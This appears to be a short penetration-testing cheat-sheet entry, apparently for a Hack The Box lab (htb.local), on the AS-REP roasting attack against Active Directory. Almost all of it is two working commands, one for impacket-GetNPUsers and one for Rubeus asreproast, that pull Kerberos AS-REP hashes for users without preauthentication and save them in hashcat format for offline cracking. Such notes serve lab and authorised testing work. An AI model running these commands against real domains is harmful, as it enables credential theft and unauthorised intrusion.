We got Users but no Pass?

ASREP Roasting Attack

impacket-GetNPUsers htb.local/ -usersfile user.txt -format hashcat -outputfile hashes.domain.txt

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]

Last updated